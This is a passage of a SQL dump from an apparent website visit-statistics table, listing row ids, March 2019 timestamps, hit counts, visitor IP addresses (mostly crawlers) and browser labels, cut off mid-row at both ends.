0,0,'54.36.150.125','other'),(399714,1552602319,1,1,0,0,'5.45.207.79','other'),(399715,1552602687,1,1,0,0,'46.229.168.140','other'),(399716,1552602753,1,1,0,0,'46.229.168.137','other'),(399717,1552602938,1,1,0,0,'46.229.168.152','other'),(399718,1552603315,1,1,0,0,'46.229.168.139','other'),(399719,1552603667,1,1,0,0,'54.36.150.18','other'),(399720,1552603708,1,1,0,0,'54.36.150.176','other'),(399721,1552603812,1,1,0,0,'54.36.148.21','other'),(399722,1552603825,1,1,0,0,'54.36.149.91','other'),(399723,1552604023,1,1,0,0,'54.36.148.135','other'),(399724,1552604106,1,1,0,0,'178.154.244.11','other'),(399725,1552604167,1,1,0,0,'54.36.148.61','other'),(399726,1552604375,1,1,0,0,'54.36.149.67','other'),(399727,1552604540,1,1,0,0,'46.229.168.136','other'),(399728,1552605105,1,1,0,0,'46.229.168.139','other'),(399729,1552605312,2,2,0,0,'157.55.39.55','other'),(399730,1552605433,1,1,0,0,'54.36.150.9','other'),(399731,1552605588,1,1,0,0,'157.55.39.53','other'),(399732,1552605868,6,6,0,0,'88.198.69.233','other'),(399733,1552606169,1,1,0,0,'8.29.198.27','other'),(399734,1552606194,1,1,0,0,'8.29.198.25','other'),(399735,1552606503,1,1,0,0,'54.36.148.136','other'),(399736,1552607077,1,1,0,0,'54.36.150.43','other'),(399737,1552607334,1,1,0,0,'54.36.150.15','other'),(399738,1552607630,1,1,0,0,'46.229.168.134','other'),(399739,1552608004,1,1,0,0,'66.249.66.134','chrome'),(399740,1552608068,1,1,0,0,'54.36.148.39','other'),(399741,1552608349,1,1,0,0,'46.229.168.132','other'),(399742,1552609134,1,1,0,0,'216.244.66.241','other'),(399743,1552609332,1,1,0,0,'194.113.106.125','chrome'),(399744,1552609445,1,1,0,0,'157.55.39.55','other'),(399745,1552609589,1,1,0,0,'54.36.150.152','other'),(399746,1552609593,1,1,0,0,'46.229.168.137','other'),(399747,1552609637,2,2,0,0,'157.55.39.56','other'),(399748,1552609693,1,1,0,0,'54.36.150.110','other'),(399749,1552609846,1,1,0,0,'66.249.66.134','chrome'),(399750,1552609920,1,1,0,0,'46.229.168.146','other'),(399751,1552610277,1,1,0,0,'46.229.168.147','other'),(399752,1552610318,1,1,0,0,'54.36.149.4','other'),(399753,1552610425,1,1,0,0,'66.249.66.138','chrome'),(399754,1552610536,1,1,0,0,'157.55.39.53','other'),(399755,1552610624,1,1,0,0,'54.36.149.90','other'),(399756,1552610632,1,1,0,0,'104.132.61.91','chrome'),(399757,1552610764,1,1,0,0,'54.36.149.81','other'),(399758,1552610925,1,1,0,0,'46.229.168.133','other'),(399759,1552611003,1,1,0,0,'54.36.150.33','other'),(399760,1552611101,1,1,0,0,'54.36.150.114','other'),(399761,1552611163,1,1,0,0,'54.36.148.180','other'),(399762,1552611165,1,1,0,0,'54.36.148.236','other'),(399763,1552611226,1,1,0,0,'66.249.66.134','chrome'),(399764,1552611510,1,1,0,0,'66.249.66.60','chrome'),(399765,1552611682,1,1,0,0,'54.36.148.189','other'),(399766,1552611742,1,1,0,0,'54.36.150.143','other'),(399767,1552611908,1,1,0,0,'54.36.148.130','other'),(399768,1552612377,1,1,0,0,'54.36.150.176','other'),(399769,1552612691,2,2,0,0,'157.55.39.53','other'),(399770,1552612981,1,1,0,0,'54.36.149.45','other'),(399771,1552613066,1,1,0,0,'54.36.149.38','other'),(399772,1552613584,1,1,0,0,'207.46.13.14','other'),(399773,1552613636,1,1,0,0,'66.249.66.60','chrome'),(399774,1552613664,1,1,0,0,'54.36.150.19','other'),(399775,1552613805,1,1,0,0,'66.249.66.138','chrome'),(399776,1552613884,1,1,0,0,'54.36.148.61','other'),(399777,1552614163,1,1,0,0,'54.36.148.58','other'),(399778,1552614244,1,1,0,0,'216.244.66.241','other'),(399779,1552614392,1,1,0,0,'157.55.39.56','other'),(399780,1552614476,1,1,0,0,'54.36.150.97','other'),(399781,1552614531,1,1,0,0,'157.55.39.53','other'),(399782,1552614904,1,1,0,0,'54.36.149.90','other'),(399783,1552615078,1,1,0,0,'207.46.13.14','other'),(399784,1552615281,1,1,0,0,'54.36.149.32','other'),(399785,1552615419,1,1,0,0,'54.36.149.2','other'),(399786,1552615814,1,1,0,0,'54.36.148.252','other'),(399787,1552616192,1,1,0,0,'207.46.13.14','other'),(399788,1552616364,1,1,0,0,'157.55.39.56','other'),(399789,1552616421,1,1,0,0,'216.244.66.241','other'),(399790,1552616656,1,1,0,0,'209.17.96.202','other'),(399791,1552616932,1,1,0,0,'66.249.66.134','chrome'),(399792,1552617018,1,1,0,0,'8.29.198.26','other'),(399793,1552617034,1,1,0,0,'8.29.198.27','other'),(399794,1552617428,1,1,0,0,'54.36.150.183','other'),(399795,1552617532,1,1,0,0,'54.36.150.64','other'),(399796,1552617685,1,1,0,0,'178.154.244.11','other'),(399797,1552617697,2,2,0,0,'34.220.24.117','chrome'),(399798,1552617744,1,1,0,0,'5.45.207.19','other'),(399799,1552618002,1,1,0,0,'141.8.142.103','other'),(399800,1552618011,1,1,0,0,'54.36.150.114','other'),(399801,1552618056,1,1,0,0,'54.36.148.4','other'),(399802,1552618266,1,1,0,0,'54.36.150.43','other'),(399803,1552618276,1,1,0,0,'213.180.203.9','other'),(399804,1552618284,1,1,0,0,'54.36.150.184','other'),(399805,1552618893,1,1,0,0,'54.36.150.191','other'),(399806,1552618959,1,1,0,0,'54.36.148.50','other'),(399807,1552618960,2,2,0,0,'5.45.207.19','other'),(399808,1552619085,1,1,0,0,'46.229.168.142','other'),(399809,1552619122,1,1,0,0,'54.36.148.107','other'),(399810,1552619242,1,1,0,0,'54.36.149.29','other'),(399811,1552619256,2,2,0,0,'178.154.244.11','other'),(399812,1552619400,1,1,0,0,'23.228.81.10','chrome'),(399813,1552619530,1,1,0,0,'54.36.150.113','other'),(399814,1552619579,1,1,0,0,'54.36.150.138','other'),(399815,1552619620,1,1,0,0,'5.45.207.79','other'),(399816,1552619867,1,1,0,0,'54.36.148.34','other'),(399817,1552619996,1,1,0,0,'54.36.149.84','other'),(399818,1552620017,1,1,0,0,'54.36.148.79','other'),(399819,1552620102,1,1,0,0,'54.36.148.154','other'),(399820,1552620246,1,1,0,0,'178.154.171.24','other'),(399821,1552620322,1,1,0,0,'141.8.183.23','other'),(399822,1552620345,1,1,0,0,'46.229.168.135','other'),(399823,1552620349,1,1,0,0,'54.36.148.182','other'),(399824,1552620372,1,1,0,0,'178.154.244.11','other'),(399825,1552620480,2,2,0,0,'66.249.66.138','chrome'),(399826,1552620532,1,1,0,0,'54.36.148.140','other'),(399827,1552620582,1,1,0,0,'5.45.207.19','other'),(399828,1552620680,1,1,0,0,'141.8.142.103','other'),(399829,1552620702,2,2,0,0,'66.249.66.136','chrome'),(399830,1552620830,1,1,0,0,'180.76.15.10','other'),(399831,1552621258,1,1,0,0,'54.36.149.105','other'),(399832,1552621304,2,2,0,0,'5.45.207.79','other'),(399833,1552621515,1,1,0,0,'207.46.13.14','other'),(399834,1552621842,1,1,0,0,'54.36.150.180','other'),(399835,1552622045,1,1,0,0,'46.229.168.145','other'),(399836,1552622422,1,1,0,0,'46.229.168.140','other'),(399837,1552622447,290,290,0,0,'144.76.40.222','other'),(399838,1552622488,1,1,0,0,'54.36.148.95','other'),(399839,1552622720,1,1,0,0,'157.55.39.53','other'),(399840,1552622829,1,1,0,0,'180.76.15.135','other'),(399841,1552622897,1,1,0,0,'54.36.148.71','other'),(399842,1552623432,1,1,0,0,'46.229.168.150','other'),(399843,1552623503,1,1,0,0,'54.36.150.16','other'),(399844,1552623754,1,1,0,0,'66.249.66.62','chrome'),(399845,1552623797,1,1,0,0,'66.249.66.138','chrome'),(399846,1552624027,20,20,0,0,'173.249.18.224','other'),(399847,1552624039,1,1,0,0,'54.36.150.67','other'),(399848,1552624200,1,1,0,0,'46.229.168.145','other'),(399849,1552624294,1,1,0,0,'54.36.148.13','other'),(399850,1552624425,2,2,0,0,'207.46.13.77','other'),(399851,1552624437,1,1,0,0,'54.36.148.212','other'),(399852,1552624545,1,1,0,0,'66.249.66.136','chrome'),(399853,1552624985,1,1,0,0,'178.154.244.11','other'),(399854,1552625205,1,1,0,0,'157.55.39.53','other'),(399855,1552625331,1,1,0,0,'216.244.66.241','other'),(399856,1552625492,2,2,0,0,'66.249.66.134','chrome'),(399857,1552625565,1,1,0,0,'54.36.149.102','other'),(399858,1552625581,1,1,0,0,'207.46.13.125','other'),(399859,1552625854,1,1,0,0,'54.36.149.7','other'),(399860,1552626060,1,1,0,0,'66.249.66.62','chrome'),(399861,1552626093,1,1,0,0,'54.36.148.53','other'),(399862,1552626206,3,3,0,0,'207.244.157.10','other'),(399863,1552626221,1,1,0,0,'207.46.13.14','other'),(399864,1552626273,1,1,0,0,'54.36.149.107','other'),(399865,1552626450,2,2,0,0,'66.249.66.134','chrome'),(399866,1552627146,1,1,0,0,'66.249.66.136','chrome'),(399867,1552627247,3,3,0,0,'207.244.157.10','other'),(399868,1552627294,1,1,0,0,'54.36.150.11','other'),(399869,1552627629,1,1,0,0,'66.249.66.134','chrome'),(399870,1552627854,1,1,0,0,'8.29.198.25','other'),(399871,1552627874,1,1,0,0,'8.29.198.27','other'),(399872,1552628187,3,3,0,0,'66.249.66.138','chrome'),(399873,1552628460,1,1,0,0,'157.55.39.53','other'),(399874,1552629188,1,1,0,0,'207.46.13.77','other'),(399875,1552629224,1,1,0,0,'91.196.178.134','firefox'),(399876,1552629229,1,1,0,0,'54.36.149.16','other'),(399877,1552629233,1,1,0,0,'180.163.220.3','chrome'),(399878,1552629277,1,1,0,0,'180.163.220.68','other'),(399879,1552629303,1,1,0,0,'66.249.66.138','chrome'),(399880,1552629405,1,1,0,0,'54.36.150.79','other'),(399881,1552629460,1,1,0,0,'207.46.13.14','other'),(399882,1552629502,1,1,0,0,'46.229.168.143','other'),(399883,1552629755,1,1,0,0,'54.36.149.14','other'),(399884,1552629815,1,1,0,0,'54.36.150.129','other'),(399885,1552630032,1,1,0,0,'54.36.149.7','other'),(399886,1552630819,1,1,0,0,'66.249.66.138','chrome'),(399887,1552631291,1,1,0,0,'157.55.39.123','other'),(399888,1552631384,1,1,0,0,'54.36.148.49','other'),(399889,1552631514,1,1,0,0,'77.247.181.165','other'),(399890,1552632067,1,1,0,0,'40.77.167.100','other'),(399891,1552632384,1,1,0,0,'141.8.142.103','other'),(399892,1552632524,1,1,0,0,'207.46.13.125','other'),(399893,1552632698,1,1,0,0,'54.36.150.182','other'),(399894,1552632835,1,1,0,0,'54.36.149.62','other'),(399895,1552633048,2,2,0,0,'95.108.213.4','other'),(399896,1552633125,2,2,0,0,'66.249.66.138','chrome'),(399897,1552633134,1,1,0,0,'5.45.207.79','other'),(399898,1552633388,1,1,0,0,'66.249.66.60','chrome'),(399899,1552633500,1,1,0,0,'54.36.149.82','other'),(399900,1552633600,1,1,0,0,'54.36.148.148','other'),(399901,1552633902,1,1,0,0,'54.36.148.138','other'),(399902,1552633939,1,1,0,0,'46.229.168.151','other'),(399903,1552634344,1,1,0,0,'46.200.46.133','chrome'),(399904,1552634472,1,1,0,0,'91.196.177.156','chrome'),(399905,1552634852,1,1,0,0,'66.249.66.136','chrome'),(399906,1552634961,1,1,0,0,'46.229.168.150','other'),(399907,1552635062,1,1,0,0,'66.249.66.138','chrome'),(399908,1552635219,1,1,0,0,'54.36.148.9','other'),(399909,1552635574,1,1,0,0,'54.36.150.118','other'),(399910,1552635755,1,1,0,0,'54.36.149.41','other'),(399911,1552635760,1,1,0,0,'46.211.150.52','chrome'),(399912,1552635989,2,2,0,0,'66.249.66.136','chrome'),(399913,1552636006,1,1,0,0,'54.36.148.219','other'),(399914,1552636152,1,1,0,0,'54.36.150.190','other'),(399915,1552636164,1,1,0,0,'54.36.150.65','other'),(399916,1552636502,1,1,0,0,'87.250.224.47','other'),(399917,1552636589,1,1,0,0,'66.249.66.134','chrome'),(399918,1552636623,3,3,0,0,'178.154.244.11','other'),(399919,1552636863,1,1,0,0,'141.8.142.103','other'),(399920,1552636940,1,1,0,0,'5.45.207.19','other'),(399921,1552637252,1,1,0,0,'66.249.66.138','chrome'),(399922,1552637257,1,1,0,0,'5.45.207.79','other'),(399923,1552637264,1,1,0,0,'46.229.168.134','other'),(399924,1552637325,1,1,0,0,'54.36.150.135','other'),(399925,1552637641,1,1,0,0,'40.77.167.195','other'),(399926,1552637713,1,1,0,0,'54.36.149.18','other'),(399927,1552638379,1,1,0,0,'66.249.66.136','chrome'),(399928,1552638707,1,1,0,0,'8.29.198.25','other'),(399929,1552638729,1,1,0,0,'8.29.198.26','other'),(399930,1552638774,1,1,0,0,'54.36.148.187','other'),(399931,1552638879,1,1,0,0,'91.196.178.82','chrome'),(399932,1552639081,1,1,0,0,'46.211.25.244','chrome'),(399933,1552639370,1,1,0,0,'54.36.148.59','other'),(399934,1552639443,1,1,0,0,'46.211.26.98','chrome'),(399935,1552639481,1,1,0,0,'54.36.149.54','other'),(399936,1552639768,1,1,0,0,'46.229.168.130','other'),(399937,1552640207,1,1,0,0,'46.229.168.139','other'),(399938,1552640506,1,1,0,0,'66.249.66.138','chrome'),(399939,1552640556,2,2,0,0,'194.146.139.175','chrome'),(399940,1552640634,1,1,0,0,'54.36.148.107','other'),(399941,1552641253,1,1,0,0,'66.249.66.60','chrome'),(399942,1552641278,1,1,0,0,'54.36.150.71','other'),(399943,1552641650,2,2,0,0,'40.77.167.195','other'),(399944,1552641664,2,2,0,0,'66.249.66.136','chrome'),(399945,1552641948,1,1,0,0,'54.36.148.234','other'),(399946,1552642078,1,1,0,0,'54.36.148.71','other'),(399947,1552642122,1,1,0,0,'40.77.167.100','other'),(399948,1552642174,1,1,0,0,'199.58.86.209','other'),(399949,1552642384,1,1,0,0,'54.36.148.122','other'),(399950,1552642487,1,1,0,0,'46.229.168.149','other'),(399951,1552642610,1,1,0,0,'54.36.149.25','other'),(399952,1552643131,1,1,0,0,'54.36.150.103','other'),(399953,1552643468,1,1,0,0,'54.36.150.106','other'),(399954,1552643799,1,1,0,0,'91.196.178.165','chrome'),(399955,1552643907,1,1,0,0,'66.249.66.136','chrome'),(399956,1552644258,1,1,0,0,'46.211.26.98','chrome'),(399957,1552644289,1,1,0,0,'54.36.149.73','other'),(399958,1552644602,1,1,0,0,'54.36.150.11','other'),(399959,1552644927,1,1,0,0,'54.36.149.37','other'),(399960,1552645104,1,1,0,0,'54.36.150.174','other'),(399961,1552645475,1,1,0,0,'66.249.66.136','chrome'),(399962,1552645865,2,2,0,0,'66.249.66.138','chrome'),(399963,1552645883,1,1,0,0,'195.191.139.166','opera'),(399964,1552646032,1,1,0,0,'54.36.150.51','other'),(399965,1552646034,1,1,0,0,'185.11.80.36','chrome'),(399966,1552646364,1,1,0,0,'54.36.149.51','other'),(399967,1552646784,1,1,0,0,'54.36.148.24','other'),(399968,1552646847,1,1,0,0,'54.36.148.118','other'),(399969,1552646974,1,1,0,0,'46.229.168.150','other'),(399970,1552647030,1,1,0,0,'46.229.168.141','other'),(399971,1552647092,2,2,0,0,'80.254.155.43','chrome'),(399972,1552647317,1,1,0,0,'176.118.48.35','firefox'),(399973,1552647382,1,1,0,0,'207.46.13.253','other'),(399974,1552648236,1,1,0,0,'54.36.150.156','other'),(399975,1552648349,1,1,0,0,'54.36.149.93','other'),(399976,1552648426,1,1,0,0,'46.211.45.223','chrome'),(399977,1552648617,1,1,0,0,'37.187.134.60','firefox'),(399978,1552648625,1,1,0,0,'66.249.66.136','chrome'),(399979,1552648803,1,1,0,0,'66.249.66.138','chrome'),(399980,1552648855,1,1,0,0,'66.249.66.60','chrome'),(399981,1552649208,1,1,0,0,'51.255.65.46','other'),(399982,1552649418,1,1,0,0,'54.36.150.117','other'),(399983,1552649530,1,1,0,0,'5.45.207.79','other'),(399984,1552649556,1,1,0,0,'8.29.198.27','other'),(399985,1552649572,1,1,0,0,'8.29.198.26','other'),(399986,1552649622,1,1,0,0,'54.36.149.99','other'),(399987,1552649769,1,1,0,0,'213.180.203.48','other'),(399988,1552649802,1,1,0,0,'66.249.66.134','chrome'),(399989,1552649834,2,2,0,0,'5.45.207.80','other'),(399990,1552649970,1,1,0,0,'37.9.113.103','other'),(399991,1552650429,1,1,0,0,'193.238.152.59','chrome'),(399992,1552650467,1,1,0,0,'91.124.21.244','chrome'),(399993,1552650547,1,1,0,0,'87.250.224.64','other'),(399994,1552650903,1,1,0,0,'46.229.168.135','other'),(399995,1552650922,1,1,0,0,'54.36.148.83','other'),(399996,1552650931,1,1,0,0,'37.9.113.38','other'),(399997,1552650936,1,1,0,0,'5.255.253.22','other'),(399998,1552650981,1,1,0,0,'95.108.213.4','other'),(399999,1552651685,1,1,0,0,'91.201.246.204','chrome'),(400000,1552651731,2,2,0,0,'157.55.39.78','other'),(400001,1552651748,1,1,0,0,'54.36.149.103','other'),(400002,1552651755,1,1,0,0,'91.196.178.93','chrome'),(400003,1552651954,1,1,0,0,'216.244.66.241','other'),(400004,1552652210,1,1,0,0,'46.229.168.136','other'),(400005,1552652483,1,1,0,0,'66.249.66.136','chrome'),(400006,1552652776,1,1,0,0,'54.36.150.140','other'),(400007,1552653020,1,1,0,0,'54.36.150.42','other'),(400008,1552653120,1,1,0,0,'66.249.66.62','chrome'),(400009,1552653456,1,1,0,0,'66.249.66.134','chrome'),(400010,1552653624,1,1,0,0,'54.36.148.51','other'),(400011,1552653706,1,1,0,0,'46.229.168.152','other'),(400012,1552654006,1,1,0,0,'40.77.167.195','other'),(400013,1552654015,1,1,0,0,'37.73.222.100','chrome'),(400014,1552654098,1,1,0,0,'66.249.66.58','chrome'),(400015,1552654190,1,1,0,0,'54.36.149.56','other'),(400016,1552654268,1,1,0,0,'66.249.66.136','chrome'),(400017,1552654372,1,1,0,0,'66.249.66.138','chrome'),(400018,1552654601,1,1,0,0,'157.55.39.113','other'),(400019,1552655064,1,1,0,0,'54.36.149.91','other'),(400020,1552655254,1,1,0,0,'54.36.150.164','other'),(400021,1552655309,1,1,0,0,'66.249.66.138','chrome'),(400022,1552655515,1,1,0,0,'54.36.150.161','other'),(400023,1552655648,1,1,0,0,'54.36.149.74','other'),(400024,1552655690,1,1,0,0,'54.36.148.159','other'),(400025,1552655926,1,1,0,0,'207.241.229.51','other'),(400026,1552656332,1,1,0,0,'91.196.178.93','chrome'),(400027,1552656445,1,1,0,0,'173.249.41.138','other'),(400028,1552656545,1,1,0,0,'207.241.233.159','other'),(400029,1552656752,1,1,0,0,'46.229.168.144','other'),(400030,1552656958,1,1,0,0,'54.36.150.49','other'),(400031,1552656972,1,1,0,0,'157.55.39.113','other'),(400032,1552657122,1,1,0,0,'54.36.148.252','other'),(400033,1552657158,1,1,0,0,'194.242.100.82','chrome'),(400034,1552657336,1,1,0,0,'207.241.229.51','other'),(400035,1552657498,1,1,0,0,'46.229.168.133','other'),(400036,1552657677,1,1,0,0,'157.55.39.78','other'),(400037,1552657910,1,1,0,0,'54.36.148.202','other'),(400038,1552658000,2,2,0,0,'37.52.18.15','chrome'),(400039,1552658031,1,1,0,0,'66.249.66.62','chrome'),(400040,1552658119,1,1,0,0,'46.229.168.129','other'),(400041,1552658381,1,1,0,0,'54.36.149.28','other'),(400042,1552658801,1,1,0,0,'54.36.148.25','other'),(400043,1552658816,1,1,0,0,'54.36.149.86','other'),(400044,1552658870,1,1,0,0,'54.36.150.1','other'),(400045,1552658991,1,1,0,0,'34.207.146.166','other'),(400046,1552659007,1,1,0,0,'54.36.149.45','other'),(400047,1552659242,1,1,0,0,'66.249.66.138','chrome'),(400048,1552659258,1,1,0,0,'54.36.148.50','other'),(400049,1552659280,1,1,0,0,'207.241.229.148','other'),(400050,1552659484,1,1,0,0,'157.55.39.7','other'),(400051,1552659521,1,1,0,0,'54.36.149.21','other'),(400052,1552659627,1,1,0,0,'37.55.56.4','chrome'),(400053,1552659912,1,1,0,0,'54.36.150.168','other'),(400054,1552659953,1,1,0,0,'54.36.150.162','other'),(400055,1552659990,1,1,0,0,'54.36.148.51','other'),(400056,1552660244,1,1,0,0,'54.36.150.99','other'),(400057,1552660302,1,1,0,0,'66.249.66.138','chrome'),(400058,1552660386,1,1,0,0,'54.36.150.117','other'),(400059,1552660413,1,1,0,0,'8.29.198.27','other'),(400060,1552660427,1,1,0,0,'8.29.198.25','other'),(400061,1552661140,1,1,0,0,'54.36.148.143','other'),(400062,1552661463,1,1,0,0,'54.36.149.84','other'),(400063,1552661724,1,1,0,0,'95.135.21.22','chrome'),(400064,1552661935,1,1,0,0,'54.36.150.21','other'),(400065,1552662147,2,2,0,0,'141.8.142.144','other'),(400066,1552662372,1,1,0,0,'54.36.148.132','other'),(400067,1552662509,1,1,0,0,'141.8.142.103','other'),(400068,1552662837,1,1,0,0,'95.108.181.83','other'),(400069,1552662862,1,1,0,0,'91.196.178.172','chrome'),(400070,1552662914,1,1,0,0,'213.180.203.9','other'),(400071,1552663185,1,1,0,0,'178.154.171.17','other'),(400072,1552663296,1,1,0,0,'91.230.25.106','chrome'),(400073,1552663559,1,1,0,0,'5.45.207.79','other'),(400074,1552663636,1,1,0,0,'141.8.142.108','other'),(400075,1552663639,1,1,0,0,'87.250.224.99','other'),(400076,1552663839,1,1,0,0,'216.244.66.241','other'),(400077,1552663900,1,1,0,0,'46.229.168.132','other'),(400078,1552663939,1,1,0,0,'91.196.178.172','chrome'),(400079,1552663940,1,1,0,0,'180.76.15.140','other'),(400080,1552663998,1,1,0,0,'54.36.150.90','other'),(400081,1552664232,1,1,0,0,'54.36.148.184','other'),(400082,1552664484,1,1,0,0,'54.36.150.38','other'),(400083,1552664776,1,1,0,0,'54.36.150.142','other'),(400084,1552664927,1,1,0,0,'157.55.39.78','other'),(400085,1552665161,1,1,0,0,'54.36.148.125','other'),(400086,1552665461,1,1,0,0,'66.249.66.134','chrome'),(400087,1552665678,1,1,0,0,'66.249.66.60','chrome'),(400088,1552665729,1,1,0,0,'54.36.148.175','other'),(400089,1552665852,1,1,0,0,'40.77.167.151','other'),(400090,1552665913,1,1,0,0,'91.196.178.97','chrome'),(400091,1552666199,1,1,0,0,'54.36.148.136','other'),(400092,1552666309,1,1,0,0,'54.36.150.94','other'),(400093,1552666846,1,1,0,0,'46.229.168.138','other'),(400094,1552667158,1,1,0,0,'54.36.149.43','other'),(400095,1552667538,1,1,0,0,'66.249.66.58','chrome'),(400096,1552667680,1,1,0,0,'54.36.150.80','other'),(400097,1552667841,1,1,0,0,'216.244.66.241','other'),(400098,1552667964,1,1,0,0,'54.36.148.100','other'),(400099,1552668040,1,1,0,0,'82.145.211.57','other'),(400100,1552668531,1,1,0,0,'54.36.149.27','other'),(400101,1552669111,1,1,0,0,'54.36.148.249','other'),(400102,1552670027,1,1,0,0,'46.229.168.129','other'),(400103,1552671113,1,1,0,0,'46.229.168.151','other'),(400104,1552671255,1,1,0,0,'8.29.198.25','other'),(400105,1552671270,1,1,0,0,'8.29.198.26','other'),(400106,1552671524,1,1,0,0,'40.77.167.151','other'),(400107,1552672298,1,1,0,0,'66.249.66.142','chrome'),(400108,1552673344,1,1,0,0,'95.108.181.96','other'),(400109,1552673673,1,1,0,0,'37.9.113.20','other'),(400110,1552673893,1,1,0,0,'46.229.168.129','other'),(400111,1552674142,1,1,0,0,'46.229.168.146','other'),(400112,1552674236,1,1,0,0,'66.249.66.136','chrome'),(400113,1552674556,1,1,0,0,'46.229.168.141','other'),(400114,1552674748,1,1,0,0,'40.77.167.151','other'),(400115,1552674773,1,1,0,0,'46.229.168.138','other'),(400116,1552674806,1,1,0,0,'46.229.168.152','other'),(400117,1552674937,1,1,0,0,'46.229.168.137','other'),(400118,1552677382,1,1,0,0,'157.55.39.204','other'),(400119,1552678433,1,1,0,0,'46.229.168.148','other'),(400120,1552678805,1,1,0,0,'157.55.39.204','other'),(400121,1552678863,1,1,0,0,'46.229.168.142','other'),(400122,1552680776,1,1,0,0,'46.229.168.137','other'),(400123,1552680778,2,2,0,0,'216.244.66.241','other'),(400124,1552680939,1,1,0,0,'37.9.113.38','other'),(400125,1552681154,1,1,0,0,'40.77.167.100','other'),(400126,1552681180,1,1,0,0,'93.158.166.7','other'),(400127,1552681446,1,1,0,0,'66.249.66.138','chrome'),(400128,1552682089,1,1,0,0,'8.29.198.25','other'),(400129,1552682115,1,1,0,0,'8.29.198.27','other'),(400130,1552682161,1,1,0,0,'46.229.168.148','other'),(400131,1552683411,2,2,0,0,'40.77.167.100','other'),(400132,1552684178,1,1,0,0,'141.8.142.144','other'),(400133,1552684357,1,1,0,0,'37.9.113.20','other'),(400134,1552684494,1,1,0,0,'141.8.142.162','other'),(400135,1552684506,1,1,0,0,'5.45.207.19','other'),(400136,1552684581,2,2,0,0,'95.108.213.4','other'),(400137,1552684806,1,1,0,0,'213.180.203.17','other'),(400138,1552684810,1,1,0,0,'87.250.224.64','other'),(400139,1552686652,1,1,0,0,'95.108.213.4','other'),(400140,1552686882,1,1,0,0,'46.229.168.140','other'),(400141,1552687233,1,1,0,0,'87.250.224.81','other'),(400142,1552687262,1,1,0,0,'178.154.171.17','other'),(400143,1552687332,1,1,0,0,'66.249.66.62','chrome'),(400144,1552687466,1,1,0,0,'46.229.168.150','other'),(400145,1552688101,1,1,0,0,'46.229.168.129','other'),(400146,1552688173,1,1,0,0,'91.209.11.236','other'),(400147,1552688526,1,1,0,0,'216.244.66.241','other'),(400148,1552688588,1,1,0,0,'46.229.168.139','other'),(400149,1552688751,4,4,0,0,'157.55.39.196','other'),(400150,1552688837,2,2,0,0,'207.46.13.105','other'),(400151,1552688994,1,1,0,0,'66.249.66.62','chrome'),(400152,1552689025,4,4,0,0,'40.77.167.100','other'),(400153,1552689658,2,2,0,0,'66.249.66.138','chrome'),(400154,1552689707,1,1,0,0,'66.249.66.136','chrome'),(400155,1552690019,1,1,0,0,'46.229.168.137','other'),(400156,1552690516,1,1,0,0,'66.249.66.134','chrome'),(400157,1552690571,1,1,0,0,'207.46.13.225','other'),(400158,1552690902,1,1,0,0,'178.154.244.11','other'),(400159,1552691070,1,1,0,0,'46.229.168.144','other'),(400160,1552691887,1,1,0,0,'46.229.168.133','other'),(400161,1552691969,1,1,0,0,'95.108.213.4','other'),(400162,1552692125,1,1,0,0,'46.229.168.145','other'),(400163,1552692286,1,1,0,0,'46.229.168.152','other'),(400164,1552692300,1,1,0,0,'91.230.25.106','chrome'),(400165,1552692927,1,1,0,0,'8.29.198.25','other'),(400166,1552692944,1,1,0,0,'8.29.198.27','other'),(400167,1552693329,1,1,0,0,'46.229.168.135','other'),(400168,1552693571,1,1,0,0,'178.154.171.69','other'),(400169,1552694065,1,1,0,0,'40.77.167.26','other'),(400170,1552694576,2,2,0,0,'46.229.168.143','other'),(400171,1552694643,1,1,0,0,'5.45.207.79','other'),(400172,1552694800,1,1,0,0,'194.113.106.124','chrome'),(400173,1552694913,1,1,0,0,'46.229.168.144','other'),(400174,1552695143,2,2,0,0,'46.229.168.151','other'),(400175,1552695145,1,1,0,0,'66.249.66.38','chrome'),(400176,1552695188,1,1,0,0,'157.55.39.196','other'),(400177,1552695647,1,1,0,0,'66.249.66.136','chrome'),(400178,1552696371,1,1,0,0,'176.193.242.116','chrome'),(400179,1552696682,1,1,0,0,'93.158.166.7','other'),(400180,1552696700,1,1,0,0,'87.250.224.47','other'),(400181,1552696864,1,1,0,0,'46.229.168.133','other'),(400182,1552696990,1,1,0,0,'141.8.142.103','other'),(400183,1552697003,1,1,0,0,'37.9.113.103','other'),(400184,1552697100,1,1,0,0,'141.8.142.108','other'),(400185,1552697110,2,2,0,0,'178.154.171.17','other'),(400186,1552697177,1,1,0,0,'37.9.113.20','other'),(400187,1552697180,1,1,0,0,'95.108.181.75','other'),(400188,1552697206,1,1,0,0,'46.229.168.143','other'),(400189,1552697209,2,2,0,0,'87.250.224.65','other'),(400190,1552697264,1,1,0,0,'157.55.39.196','other'),(400191,1552697377,1,1,0,0,'178.154.244.11','other'),(400192,1552697479,1,1,0,0,'207.46.13.31','other'),(400193,1552697692,1,1,0,0,'5.45.207.19','other'),(400194,1552697905,2,2,0,0,'46.229.168.134','other'),(400195,1552698003,1,1,0,0,'34.220.219.244','other'),(400196,1552698450,1,1,0,0,'213.180.203.9','other'),(400197,1552698576,1,1,0,0,'178.154.244.11','other'),(400198,1552698931,1,1,0,0,'46.229.168.149','other'),(400199,1552699935,1,1,0,0,'95.163.255.44','other'),(400200,1552700123,1,1,0,0,'5.45.207.19','other'),(400201,1552700206,1,1,0,0,'5.45.207.79','other'),(400202,1552700483,1,1,0,0,'3.90.205.8','other'),(400203,1552700643,1,1,0,0,'178.154.244.11','other'),(400204,1552700719,1,1,0,0,'46.229.168.137','other'),(400205,1552700793,1,1,0,0,'66.249.66.134','chrome'),(400206,1552701368,1,1,0,0,'5.45.207.79','other'),(400207,1552702194,1,1,0,0,'157.55.39.196','other'),(400208,1552702335,1,1,0,0,'66.249.66.138','chrome'),(400209,1552702354,1,1,0,0,'46.229.168.147','other'),(400210,1552702830,1,1,0,0,'207.46.13.199','other'),(400211,1552703286,1,1,0,0,'46.229.168.129','other'),(400212,1552703763,2,2,0,0,'8.29.198.27','other'),(400213,1552704499,1,1,0,0,'194.113.106.11','chrome'),(400214,1552704864,1,1,0,0,'66.249.66.136','chrome'),(400215,1552705109,1,1,0,0,'5.45.207.19','other'),(400216,1552705530,2,2,0,0,'178.154.244.11','other'),(400217,1552705609,1,1,0,0,'46.229.168.137','other'),(400218,1552705674,2,2,0,0,'35.161.46.20','chrome'),(400219,1552706171,1,1,0,0,'66.249.66.134','chrome'),(400220,1552707303,1,1,0,0,'66.249.66.136','chrome'),(400221,1552708088,1,1,0,0,'54.208.102.37','other'),(400222,1552708090,1,1,0,0,'107.21.1.8','other'),(400223,1552708214,1